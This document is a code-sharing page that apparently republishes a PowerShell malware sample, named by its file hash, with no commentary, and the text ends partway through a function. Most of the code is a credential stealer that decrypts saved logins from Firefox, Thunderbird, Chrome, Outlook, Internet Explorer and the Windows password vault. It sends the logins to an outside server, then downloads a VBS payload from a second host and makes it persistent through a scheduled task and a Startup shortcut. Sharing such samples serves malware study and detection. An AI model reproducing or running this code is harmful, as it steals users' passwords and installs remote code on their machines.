Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/834fffd10bde94c6020d3ee72cc94140b29bb7ac4cd9afdb2d68278da74f5bb2

Created October 30, 2019 14:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnLaTwC/6e1f84f4f2c5b808646f73e80e3d0a1b to your computer and use it in GitHub Desktop.
Save JohnLaTwC/6e1f84f4f2c5b808646f73e80e3d0a1b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
834fffd10bde94c6020d3ee72cc94140b29bb7ac4cd9afdb2d68278da74f5bb2
function sxuveww( $zgzbjie ){
$jcavxhj = New-Object System.Net.WebClient;
$jcavxhj.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$jcavxhj.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$jcavxhj.Encoding = [System.Text.Encoding]::UTF8;
try{
$seezzhbd = $jcavxhj.UploadString( "http://surv.surviveandthriveparenting.com/", "guid=temp_2163694146&" + $zgzbjie );
return $seezzhbd;
}catch{};
return $false;
};
function Get-ExecutableType{
[CmdletBinding()]
param (
[Parameter(Mandatory = $true)]
[ValidateScript({ Test-Path -LiteralPath $_ -PathType Leaf })]
[string]
$Path
)
try{
try{
$stream = New-Object System.IO.FileStream(
$PSCmdlet.GetUnresolvedProviderPathFromPSPath($Path),
[System.IO.FileMode]::Open,
[System.IO.FileAccess]::Read,
[System.IO.FileShare]::Read
)
}catch{
sxuveww "crederror=ERR:Error opening file $Path for Read: $($_.Exception.Message)";
throw
}
$exeType = 'Unknown'
if ([System.IO.Path]::GetExtension($Path) -eq '.COM'){
$exeType = '16-bit'
}
$bytes = New-Object byte[](4)
if ( ($stream.Length -ge 64) -and ($stream.Read($bytes, 0, 2) -eq 2) -and ($bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A) ){
$exeType = 16
if ( ($stream.Seek(0x3C, [System.IO.SeekOrigin]::Begin) -eq 0x3C) -and ($stream.Read($bytes, 0, 4) -eq 4) ){
if (-not [System.BitConverter]::IsLittleEndian) { [Array]::Reverse($bytes, 0, 4) }
$peHeaderOffset = [System.BitConverter]::ToUInt32($bytes, 0)
if ($stream.Length -ge $peHeaderOffset + 6 -and
$stream.Seek($peHeaderOffset, [System.IO.SeekOrigin]::Begin) -eq $peHeaderOffset -and
$stream.Read($bytes, 0, 4) -eq 4 -and
$bytes[0] -eq 0x50 -and $bytes[1] -eq 0x45 -and $bytes[2] -eq 0 -and $bytes[3] -eq 0)
{
$exeType = 'Unknown'
if ($stream.Read($bytes, 0, 2) -eq 2)
{
if (-not [System.BitConverter]::IsLittleEndian) { [Array]::Reverse($bytes, 0, 2) }
$machineType = [System.BitConverter]::ToUInt16($bytes, 0)
switch ($machineType)
{
0x014C { $exeType = 32 }
0x0200 { $exeType = 64 }
0x8664 { $exeType = 64 }
}
}
}
}
}
return $exeType
}catch{
throw
}finally{
if ($null -ne $stream) { $stream.Dispose() }
}
}
$stillerBlock = {
$ErrorActionPreference = "SilentlyContinue"
$global:log = [System.IO.Path]::GetTempFileName()
try{ Start-Transcript -Append $global:log; }catch{}
function mergeInfo($data, $info){
try{
foreach($record in $data.info.Keys) {
if($info.info[$record.ToString()] -eq $null) {
$info.info[$record] = @()
}
foreach($value in $data.info[$record]) {
$info.info[$record] += @{ [string]$value.Keys = [string]$value.Values }
}
}
}catch{
sxuveww "crederror=ERR:mergeInfo: $($_.Exception.Message)";
}
}
Function ff_dump{
try{
$ffInfo = @{}
$ffError = "SUCCESS"
$mPaths = @("$env:SystemDrive\Program Files\Mozilla Firefox", "$env:SystemDrive\Program Files\Mozilla Thunderbird", "$env:SystemDrive\Program Files (x86)\Mozilla Firefox", "$env:SystemDrive\Program Files (x86)\Mozilla Thunderbird")
$mozillaPath = $null
foreach($path in $mPaths) {
$nssPath = $(Join-Path ([string]$path) ([string]'nss3.dll'))
if([System.IO.File]::Exists($nssPath)) {
$mozillaPath = ([string]$path)
break
}
}
if($mozillaPath -eq $null) {
return @{"logs" = "$global:log"; "error" = $ffError; "info" = $ffInfo}
}
try
{
Add-Type -AssemblyName System.web.extensions
}
catch
{
return @{"logs" = "$global:log"; "error" = "Load WEB assembly"; "info" = $ffInfo}
}
$netStructs = @"
public struct TSECItem2 {
public int SECItemType;
public int SECItemData;
public int SECItemLen;
}
public struct SlotInfo {
}
"@
$cp = New-Object System.CodeDom.Compiler.CompilerParameters
$cp.CompilerOptions = '/unsafe'
Add-Type -TypeDefinition $netStructs -Language CSharp -CompilerParameters $cp
$netCode = @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public static class nss3
{
[DllImport("nss3.dll", EntryPoint = "PL_Base64Decode", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Auto)]
public static extern IntPtr PL_Base64Decode(IntPtr inStr, int inLen, IntPtr outStr);
[DllImport("nss3.dll", CharSet=CharSet.Auto)]
public static extern IntPtr PK11_GetInternalKeySlot();
[DllImport("nss3.dll", CharSet=CharSet.Auto)]
public static extern void PK11_FreeSlot(IntPtr SlotInfoPtr);
[DllImport("nss3.dll", CharSet=CharSet.Auto)]
public static extern int PK11_CheckUserPassword(IntPtr slotInfo, string pwd);
[DllImport("nss3.dll", EntryPoint = "PK11SDR_Decrypt", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Ansi)]
public static extern int PK11SDR_Decrypt(IntPtr dataIn, IntPtr dataOut, string pVoid);
[DllImport("nss3.dll", EntryPoint = "SECITEM_ZfreeItem", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Ansi)]
public static extern void SECITEM_ZfreeItem(IntPtr secItem, int count);
[DllImport("nss3.dll", EntryPoint = "NSSUTIL_GetVersion", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Auto)]
public static extern IntPtr NSSUTIL_GetVersion();
[DllImport("nss3.dll", EntryPoint = "NSS_IsInitialized", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Auto)]
public static extern bool NSS_IsInitialized();
[DllImport("nss3.dll", EntryPoint = "NSS_Init", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Auto)]
public static extern int NSS_Init(byte[] path);
[DllImport("nss3.dll", EntryPoint = "NSS_Shutdown", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Auto)]
public static extern int NSS_Shutdown();
[DllImport("nss3.dll", CharSet=CharSet.Auto)]
public static extern int PORT_GetError();
[DllImport("nss3.dll", CharSet=CharSet.Auto)]
public static extern IntPtr PR_ErrorToName(int err);
}
internal static class UnsafeNativeMethods
{
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern bool FreeLibrary(IntPtr hModule);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern bool SetDllDirectoryW(string lpPathName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)]
internal static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
}
public static class Stiller
{
static IntPtr pk11slot = IntPtr.Zero;
static IntPtr vcruntime140dll = IntPtr.Zero;
static IntPtr msvcp140dll = IntPtr.Zero;
static IntPtr mozgluedll = IntPtr.Zero;
static IntPtr nss3dll = IntPtr.Zero;
public static void loadHelpers(string ffPath)
{
Stiller.vcruntime140dll = UnsafeNativeMethods.LoadLibrary(ffPath + "\\vcruntime140.dll");
Stiller.msvcp140dll = UnsafeNativeMethods.LoadLibrary(ffPath + "\\msvcp140.dll");
Stiller.mozgluedll = UnsafeNativeMethods.LoadLibrary(ffPath + "\\mozglue.dll");
}
public static IntPtr loadNSS3(string ffPath)
{
IntPtr nss3 = UnsafeNativeMethods.LoadLibrary(ffPath + "\\nss3.dll");
Stiller.nss3dll = nss3;
return nss3;
}
public static bool initFF(string ffPath, string profilePath)
{
bool result = false;
loadHelpers(ffPath);
if(loadNSS3(ffPath) != IntPtr.Zero)
{
IntPtr nV = nss3.NSSUTIL_GetVersion();
int nssInitRez = nss3.NSS_Init(Encoding.ASCII.GetBytes(profilePath));
if(nssInitRez == 0)
{
pk11slot = nss3.PK11_GetInternalKeySlot();
int checkPwd = nss3.PK11_CheckUserPassword(pk11slot, "");
if(checkPwd == 0)
{
result = true;
}
}
}
return result;
}
public static void shutdownFF()
{
nss3.PK11_FreeSlot(pk11slot);
int rez = nss3.NSS_Shutdown();
UnsafeNativeMethods.FreeLibrary(nss3dll);
UnsafeNativeMethods.FreeLibrary(Stiller.mozgluedll);
UnsafeNativeMethods.FreeLibrary(Stiller.msvcp140dll);
UnsafeNativeMethods.FreeLibrary(Stiller.vcruntime140dll);
}
public struct TSECItemType {
public int SECItemType;
public IntPtr SECItemData;
public int SECItemLen;
}
public struct SlotInfo {
public long l;
}
public static string decodeData(string profilePath, string dataEnc, byte[] unBase64)
{
string decoded = "";
try
{
bool nssIsInit = nss3.NSS_IsInitialized();
if(!nssIsInit)
{
return "";
}
int TSECItemTypeSize = Marshal.SizeOf(typeof(TSECItemType));
TSECItemType dataIn = new TSECItemType();
dataIn.SECItemData = Marshal.AllocHGlobal(unBase64.Length);
Marshal.Copy(unBase64, 0, dataIn.SECItemData, unBase64.Length);
dataIn.SECItemLen= unBase64.Length;
dataIn.SECItemType= 0;
IntPtr dataOutPtr = Marshal.AllocHGlobal(TSECItemTypeSize);
IntPtr dataInPtr = Marshal.AllocHGlobal(TSECItemTypeSize);
Marshal.StructureToPtr(dataIn, dataInPtr, true);
int decryptRez = nss3.PK11SDR_Decrypt(dataInPtr, dataOutPtr, null);
if(decryptRez != 0)
{
return "";
}
TSECItemType dataOut = (Stiller.TSECItemType)Marshal.PtrToStructure(dataOutPtr, typeof(TSECItemType)); //
decoded = PtrToStringSized(dataOut.SECItemData, dataOut.SECItemLen);
nss3.SECITEM_ZfreeItem(dataOutPtr, 0);
Marshal.FreeHGlobal(dataInPtr);
}
catch
{
return "";
}
return decoded;
}
private static string PtrToStringUtf8(IntPtr ptr) // aPtr is nul-terminated
{
if (ptr == IntPtr.Zero)
return "";
int len = 0;
while (System.Runtime.InteropServices.Marshal.ReadByte(ptr, len) != 0)
len++;
if (len == 0)
return "";
byte[] array = new byte[len];
System.Runtime.InteropServices.Marshal.Copy(ptr, array, 0, len);
return System.Text.Encoding.UTF8.GetString(array);
}
private static string PtrToStringSized(IntPtr ptr, int len) // aPtr is nul-terminated
{
if (ptr == IntPtr.Zero)
return "";
if (len == 0)
return "";
byte[] array = new byte[len];
System.Runtime.InteropServices.Marshal.Copy(ptr, array, 0, len);
return System.Text.Encoding.UTF8.GetString(array);
}
}
"@
Add-Type -TypeDefinition $netCode -Language CSharp -CompilerParameters $cp2
$profilePathFF = "$($env:APPDATA)\Mozilla\Firefox\Profiles\*.*"
$profilePathTB = "$($env:APPDATA)\ThunderBird\Profiles\*.*"
$defaultProfiles = @()
try {
$defaultProfiles += $(Get-ChildItem $profilePathFF -ErrorAction SilentlyContinue) | select -ExpandProperty FullName -ErrorAction SilentlyContinue
$defaultProfiles += $(Get-ChildItem $profilePathTB -ErrorAction SilentlyContinue) | select -ExpandProperty FullName -ErrorAction SilentlyContinue
}
catch {}
if($mozillaPath -ne $null) {
$nss = $(Join-Path ([string]$mozillaPath) ([string]'nss3.dll'))
If([System.IO.File]::Exists($nss)) {
foreach($defaultProfile in $defaultProfiles) {
if($defaultProfile -ne $null ) {
$jsonPath = $(Join-Path ([string]$defaultProfile) ([string]"logins.json"))
if([System.IO.File]::Exists($jsonPath)) {
$jsonFile = (Get-Content $jsonPath -ErrorAction SilentlyContinue)
if(!($jsonFile))
{
}
else {
$ser = New-Object System.Web.Script.Serialization.JavaScriptSerializer
$obj = $ser.DeserializeObject($jsonFile)
$initFF = $([Stiller]::initFF($mozillapath, $defaultProfile))
if($initFF -eq $True) {
$logins = $obj['logins']
$count = ($logins.Count) - 1
for($i = 0; $i -le $count; $i++)
{
$formUrl = $logins.GetValue($i)['formSubmitURL']
if($formUrl -eq $null) {
$formUrl = $logins.GetValue($i)['hostname']
if($formUrl -eq $null) {
$formUrl = "empty"
}
}
if(($formUrl.StartsWith("smtp","CurrentCultureIgnoreCase")) -Or ($formUrl.StartsWith("pop","CurrentCultureIgnoreCase")) -Or ($formUrl.StartsWith("imap","CurrentCultureIgnoreCase"))) {
$url = ([System.Uri]$formUrl).Host
}else{
$url = ([System.Uri]$formUrl).Host
if($url.Length -eq 0) {
$url = "empty"
}
}
$encPwd = $logins.GetValue($i)['encryptedPassword']
$encUser = $logins.GetValue($i)['encryptedUsername']
if($encPwd.Length -gt 0 -and $encUser.Length -gt 0) {
$pass = [Stiller]::decodeData($defaultProfile, $encPwd, [System.Convert]::FromBase64String($encPwd))
$user = [Stiller]::decodeData($defaultProfile, $encUser, [System.Convert]::FromBase64String($encUser))
if($ffInfo[$url] -eq $null) {
$ffInfo[$url] = @()
}
$ffInfo[$url] += @{ [string]$user = [string]$pass }
}
}
[Stiller]::shutdownFF()
}
}
}
else {
$ffError = "NO PROFILE"
}
}
}
}else{
$ffError = "NO ff\TB"
}
}
return @{"logs" = "$global:log"; "error" = $ffError; "info" = $ffInfo}
}catch{
sxuveww "crederror=ERR:ff_dump: $($_.Exception.Message)";
}
}
Function __ToInt($ByteArray){
try{
If ($ByteArray.Length -eq 0) { Return 0 }
[int32] $Int = 0;
$x = 0;
Do{
$Int = [math]::Floor($Int * [math]::Pow(2, 0x8)) -bor ($ByteArray[$x++])
}While ($x -lt $ByteArray.Length)
Return $Int;
}catch{
sxuveww "crederror=ERR:__ToInt: $($_.Exception.Message)";
}
}
Function ParseVarint($ByteArray, [ref]$VarintSize){
try{
[int32] $Val = 0;
$x = 0;
Do {
$Byte = $ByteArray[$x++];
$Val = [math]::Floor($Val * [math]::Pow(2, 0x7)) -bor ($Byte -band 0x7F);
}While($x -lt 8 -and ($Byte -band 0x80))
$VarintSize.Value = $x;
Return $Val;
}catch{
sxuveww "crederror=ERR:ParseVarint: $($_.Exception.Message)";
}
}
[ref]$VarintSize = 0;
Function ParseSQLite($Page){
try{
If ($Page[0] -ne 0x0D) { Return }
$NumCells = __ToInt $Page[0x3..0x4];
$CellAddrStart = 0x8;
$CellAddrStop = $CellAddrStart + ($NumCells * 2) - 1;
For ($x = $CellAddrStart; $x -le $CellAddrStop; $x += 2){
$CellAddr = __ToInt ($Page[$x .. ($x + 1)]);
ParseCellSQLite($Page[$CellAddr .. $Page.Length]);
}
}catch{
sxuveww "crederror=ERR:ParseSQLite: $($_.Exception.Message)";
}
}
Function ParseCellSQLite($Cell){
try{
$Offset = 0
$PayloadLength = ParseVarint ($Cell[$Offset .. ($Offset + 4)]) $VarintSize
$Offset += $VarintSize.Value
$RowID = ParseVarint ($Cell[$Offset .. ($Offset + 4)]) $VarintSize
$Offset += $VarintSize.Value
If (($Offset + $Payload.Length) -le $Cell.Length){
ParsePayloadSQLite $Cell[$Offset .. ($Offset + $PayloadLength - 1)]
}
}catch{
sxuveww "crederror=ERR:ParseCellSQLite: $($_.Exception.Message)";
}
}
Function ParsePayloadSQLite($Payload){
try{
If ($Payload.Length -eq 0) { Return }
[ref]$VarintSize = 0;
$HeaderLength = ParseVarint $Payload[0 .. 8] $VarintSize
$Offset = $VarintSize.Value;
$FieldSeq = @()
For ($y = $Offset; $y -lt $HeaderLength; $y++){
$Serial = ParseVarint $Payload[$y .. ($y + 8)] $VarintSize
$y += $VarintSize.Value - 1
Switch ($Serial) {
{$_ -lt 0xA} { $Len = $SerialMap[$Serial]; break }
{$_ -gt 0xB} {
If ($Serial % 2 -eq 0) { $Len = (($Serial - 0xC) / 2) }
Else { $Len = (($Serial - 0xD) / 2) }
}
}
$FieldSeq += $Len;
}
$Offset = $HeaderLength;
For ($f = 0; $f -lt $FieldSeq.Length; $f++){
$Str = $Encoding.GetString($Payload[$Offset .. ($Offset + $FieldSeq[$f] - 1)])
$isBlack = 0
If ($f -eq 0) { $url = $Str }
ElseIf ($f -eq 3) { $user = $Str }
ElseIf ($f -eq 5) { $pwd = DecodePasswordChrome($Payload[$Offset .. ($Offset + $FieldSeq[$f] - 1)]) }
$Offset += $FieldSeq[$f]
}
if(-Not($user -like '^\u0001*') -and -Not($user -like '^\u0000')) {
If ($user.Length -gt 0 -or $pwd.Length -gt 0){
$url = ([System.Uri]$url).Host
if($global:chromeInfo[$url] -eq $null) {
$global:chromeInfo[$url] = @()
}
$global:chromeInfo[$url] += @{[string]$user = [string]$pwd}
}
}
}catch{
sxuveww "crederror=ERR:ParsePayloadSQLite: $($_.Exception.Message)";
}
}
Function DecodePasswordChrome($Password){
try{
$P = $Encoding.GetBytes($Password)
try{
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Password,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Return [System.Text.Encoding]::Default.GetString($Decrypt);
}
Catch { Return "" }
}catch{
sxuveww "crederror=ERR:DecodePasswordChrome: $($_.Exception.Message)";
}
}
function chrome_dump(){
try{
$global:chromeInfo = @{};
$global:chromeError = "SUCCESS"
$dbFilePath = "$($Env:USERPROFILE)\AppData\Local\Google\Chrome\User Data\*\Login Data"
$dbFiles = $(Get-ChildItem $dbFilePath).FullName;
if($dbFiles.Count -le 0 -and $dbFiles.Length -le 0) { $global:chromeError = "NO PROFILES"; }
foreach($dbFile in $dbFiles) {
if($dbFile -ne $null) {
if(([System.IO.File]::Exists($dbFile))) {
$Stream = New-Object IO.FileStream -ArgumentList "$dbFile", 'Open', 'Read', 'ReadWrite'
Add-Type -AssemblyName System.Security
$Encoding = [System.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
$SerialMap = @{0=0; 1=1; 2=2; 3=3; 4=4; 5=5; 6=6; 7=8; 8=0; 9=0}
If ((Compare-Object $BinaryText[0x0 .. 0x5] @('S', 'Q', 'L', 'i', 't', 'e')) -eq $null){
$NumPages = __ToInt($BinaryText[0x1C .. 0x1F])
$PageSize = __ToInt($BinaryText[0x10 .. 0x11])
for($x = 0x2; $x -lt $NumPages; $x++){
$PageStart = ($x * $PageSize);
ParseSQLite $BinaryText[$PageStart .. ($PageStart + $PageSize - 1)]
}
}
}
}
}
return @{"logs" = "$global:log"; "error" = $global:chromeError; "info" = $global:chromeInfo}
}catch{
sxuveww "crederror=ERR:chrome_dump: $($_.Exception.Message)";
}
}
function ol_dump(){
try{
$wms = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*";
$office = "HKCU:\Software\Microsoft\Office\1[56].0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*";
$allPaths = @();
$olInfo = @{};
$olError = "SUCCESS";
$tmpWMS = (Get-ChildItem $wms -ErrorAction SilentlyContinue)
$tmpOffice = (Get-ChildItem $office -ErrorAction SilentlyContinue)
if($tmpWMS -ne $null){ $allPaths += $tmpWMS; }
if($tmpOffice -ne $null){ $allPaths += $tmpOffice; }
Add-Type -AssemblyName System.Security
foreach($path in $allPaths) {
$imapServer = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "IMAP Server");
if($imapServer -ne $null) {
$server = $imapServer
try{ $server = [System.Text.Encoding]::DEFAULT.GetString($imapServer) -replace "\u0000","" -replace "0x00",""; }catch {}
$userBytes = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "IMAP User");
$user = "";
if($userBytes -ne $null) {
$user = $userBytes;
try{ $user = [System.Text.Encoding]::DEFAULT.GetString($userBytes) -replace "\u0000","" -replace "\x00",""; }catch{}
}
$encPwd = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "IMAP Password");
$pwd = "";
try{
$pwd = [System.Text.Encoding]::DEFAULT.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($encPwd[1..$encPwd.Length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) -replace "\u0000","" -replace "0x00",""
}catch{}
try {
$port = [System.Text.Encoding]::DEFAULT.GetString(($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "IMAP Port")) -replace "0x00",""
$server += ":" + $port
}catch{}
if($olInfo[$server] -eq $null) { $olInfo[$server] = @(); }
$olInfo[$server] += @{ [string]$user = [string]$pwd }
$smtpServer = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "SMTP Server");
if($smtpServer -ne $null) {
$server = $smtpServer;
try{ $server = [System.Text.Encoding]::DEFAULT.GetString($smtpServer) -replace "\u0000","" -replace "0x00",""; }catch{}
if($olInfo[$server] -eq $null) { $olInfo[$server] = @(); }
$olInfo[$server] += @{ [string]$user = [string]$pwd }
}
}
$pop3Server = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "POP3 Server");
if($pop3Server -ne $null) {
$server = $pop3Server
try { $server = [System.Text.Encoding]::DEFAULT.GetString($pop3Server) -replace "\u0000","" -replace "0x00",""; }catch {}
$userBytes = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "POP3 User")
$user = "";
if($userBytes -ne $null) {
$user = $userBytes
try{ $user = [System.Text.Encoding]::DEFAULT.GetString($userBytes) -replace "\u0000","" -replace "\x00","";}catch {}
}
$encPwd = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "POP3 Password")
$pwd = "";
try {
$pwd = [System.Text.Encoding]::DEFAULT.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($encPwd[1..$encPwd.Length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) -replace "\u0000","" -replace "0x00",""
}catch {}
try {
$port = [System.Text.Encoding]::DEFAULT.GetString(($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "POP3 Port")) -replace "0x00",""
$server += ":" + $port
}catch {}
if($olInfo[$server] -eq $null){ $olInfo[$server] = @(); }
$olInfo[$server] += @{ [string]$user = [string]$pwd }
$smtpServer = ($path | Get-ItemProperty -ErrorAction SilentlyContinue | select -ErrorAction SilentlyContinue -ExpandProperty "SMTP Server");
if($smtpServer -ne $null) {
$server = $smtpServer;
try { $server = [System.Text.Encoding]::DEFAULT.GetString($smtpServer) -replace "\u0000","" -replace "0x00","";}catch {}
if($olInfo[$server] -eq $null){ $olInfo[$server] = @(); }
$olInfo[$server] += @{ [string]$user = [string]$pwd }
}
}
}
return @{"logs" = "$global:log"; "error" = $olError; "info" = $olInfo}
}catch{
sxuveww "crederror=ERR:ol_dump: $($_.Exception.Message)";
}
}
function ie_dump(){
try{
Add-Type -AssemblyName System.Security
$ieInfo = @{};
$ieError = "SUCCESS"
$shell = New-Object -ComObject Shell.Application
$hist = $shell.NameSpace(34)
$folder = $hist.Self;
if((@($hist.Items()).Count) -le 0) { $ieInfo = "NO HISTORY"; }
$hist.Items() | foreach {
if ($_.IsFolder) {
$siteFolder = $_.GetFolder
$siteFolder.Items() | foreach {
$site = $_;
if ($site.IsFolder) {
$pageFolder = $site.GetFolder;
$pageFolder.Items() | foreach {
$url = $($pageFolder.GetDetailsOf($_,0)) ;
$enc = [system.Text.Encoding]::UTF8;
$entropy= $enc.GetBytes($url);
$url16 = [System.Text.Encoding]::GetEncoding("UTF-16").GetBytes($url + "`0");
$sha1 = [System.Security.Cryptography.SHA1]::Create();
$hash = $sha1.ComputeHash($url16);
$hs = "" ; $cs = 0
$urlHASH = $($hash | %{ $hs += $_.ToString("x2") ; $cs += $_ }
($hs + ($cs % 256).ToString("x2")).ToUpper())
$fromREG = $null;
$fromREG = $(Get-ItemProperty -PATH "HKCU:\Software\Microsoft\Internet Explorer\IntelliForms\Storage2" -Name $urlHASH -ErrorAction SilentlyContinue | Select-Object -ExpandProperty $urlHASH)
if($fromREG -ne $null) {
try{ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($fromREG, $url16, [System.Security.Cryptography.DataProtectionScope]::LocalMachine); }catch { Continue }
$dwSize = [bitconverter]::ToInt32($Decrypt[0..3], 0)
$dwSecretInfoSize = [bitconverter]::ToInt32($Decrypt[4..7], 0)
$dwSecretSize = [bitconverter]::ToInt32($Decrypt[8..11], 0)
$dwTotalSecrets = [bitconverter]::ToInt32($Decrypt[20..23], 0) / 2
if($fromREG.Length -ge ($dwSize + $dwSecretInfoSize +$dwSercertSize)){
$url = ([System.Uri]$url).Host
if($ieInfo[$url] -eq $null) { $ieInfo[$url] = @(); }
$allCreds = ([System.Text.Encoding]::Default.GetString($Decrypt[($Decrypt.Length - $dwSecretSize)..($Decrypt.Length)]) -split "\x00\x00") -replace "\x00", "";
for($i = 0; $i -lt $dwTotalSecrets; $i++ ) {
$user = $allCreds[$i]
$pwd = $allCreds[$i + 1]
$ieInfo[$url] += @{ [string]$user = [string]$pwd };
}
}
}
}
}
}
}
}
if(([int32]([string][System.Environment]::OSVersion.Version.Major + [string][System.Environment]::OSVersion.Version.Minor)) -ge 62) {
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];
$vault = New-Object Windows.Security.Credentials.PasswordVault;
$allCreds = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
foreach($cred in $allCreds) {
$url = ([System.Uri]$cred.Resource).Host
if($ieInfo[$url] -eq $null) { $ieInfo[$url] = @(); }
$ieInfo[$url] += @{ [string]$cred.UserName = [string]$cred.Password }
}
}
return @{"logs" = "$global:log"; "error" = $ieError; "info" = $ieInfo}
}catch{
sxuveww "crederror=ERR:ie_dump: $($_.Exception.Message)";
}
}
$ffInfo = ff_dump
$ieInfo = ie_dump
$olInfo = ol_dump
$chromeInfo = chrome_dump
$allInfo = @{"logs" = "$global:log"; "error" = "SUCCESS"; "info" = @{}}
mergeInfo $olInfo $allInfo
mergeInfo $chromeInfo $allInfo
mergeInfo $ieInfo $allInfo
mergeInfo $ffInfo $allInfo
Add-Type -AssemblyName System.Web.Extensions;
$ps_js = new-object system.web.script.serialization.javascriptSerializer;
try{
$sendInfo = @{};
$allInfo["info"].GetEnumerator() | %{
$host1 = ([string]$_.key).toLower();
if( $host1 -ne "empty" ){
$sendInfo[ $host1 ] = @();
foreach($value in $_.value ) {
$sendInfo[ $host1 ] += @{ [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( [string]($value.Keys) ) ) = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( [string]($value.Values) ) ) };
}
}
}
try{ sxuveww ("cred=" + [uri]::EscapeDataString( $ps_js.Serialize($sendInfo) ) ); }catch{}
try{ sxuveww ("crederror=" + $allInfo["error"]); }catch{}
}catch{}
}
function jsuuibbggv(){
try{
$mPaths = @("$env:SystemDrive\Program Files\Mozilla Firefox", "$env:SystemDrive\Program Files\Mozilla Thunderbird", "$env:SystemDrive\Program Files (x86)\Mozilla Firefox", "$env:SystemDrive\Program Files (x86)\Mozilla Thunderbird")
$mozillaPath = $null
foreach($path in $mPaths) {
$nssPath = $(Join-Path ([string]$path) ([string]'nss3.dll'))
if([System.IO.File]::Exists($nssPath)) {
$mozillaPath = $path;
break;
}
}
if($mozillaPath -eq $null) {
$result = $stillerBlock.Invoke();
}else{
$dll = $(Join-Path ([string]$mozillaPath) ([string]'nss3.dll'))
$is86dll = (Get-ExecutableType -Path $dll) -eq 32
$is86 = [IntPtr]::Size -eq 4
$result = $null;
if($is86dll -and $is86) {
$result = $stillerBlock.Invoke();
}elseif(-Not($is86dll) -and -Not($is86)) {
$result = $stillerBlock.Invoke();
}elseif($is86dll -and -Not($is86)) {
Start-Job -RunAs32 -ScriptBlock $stillerBlock | Out-Null
$result = (Get-Job | Wait-Job | Receive-Job)
}elseif(-Not($is86dll) -and $is86) {
$result = $stillerBlock.Invoke();
}
}
return $result;
}catch{
sxuveww "crederror=ERR:chooseArch: $($_.Exception.Message)";
}
}
sxuveww "crederror=start chooseArch";
jsuuibbggv
function uiwhzhcwt(){
$djivxvyaz = $env:PUBLIC + "\Libraries"
if (-not (Test-Path $djivxvyaz)) { md $djivxvyaz; }
$wceiabjas = $djivxvyaz + "\WindowsIndexingService.vbs";
$ewcgzjzct = New-Object System.Net.WebClient;
$ewcgzjzct.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
try{
$cbegvadwg = Join-Path $djivxvyaz ( get-random -minimum 100 -maximum 999999 ) ;
$ewcgzjzct.DownloadString("http://band.positivelifeology.com/?need=aegzfej&vid=ln2&") | out-file $cbegvadwg;
Start-Sleep -s 5;
if( ( test-path -path $cbegvadwg ) -and ( ( (Get-Item $cbegvadwg).length/1KB) -gt 5 ) ){
Move-Item $cbegvadwg -destination $wceiabjas -Force;
$tucgzafv = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 19 /du 23:59 /TR $wceiabjas);
try{
$zhuayadhdu = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk';
if( -not ( Test-Path $zhuayadhdu ) ){
$fzyjzxjgs = New-Object -ComObject ('WScript.Shell');
$vbfugzsg = $fzyjzxjgs.CreateShortcut( $zhuayadhdu );
$vbfugzsg.TargetPath = $wceiabjas;
$vbfugzsg.WorkingDirectory = $djivxvyaz;
$vbfugzsg.WindowStyle = 1;
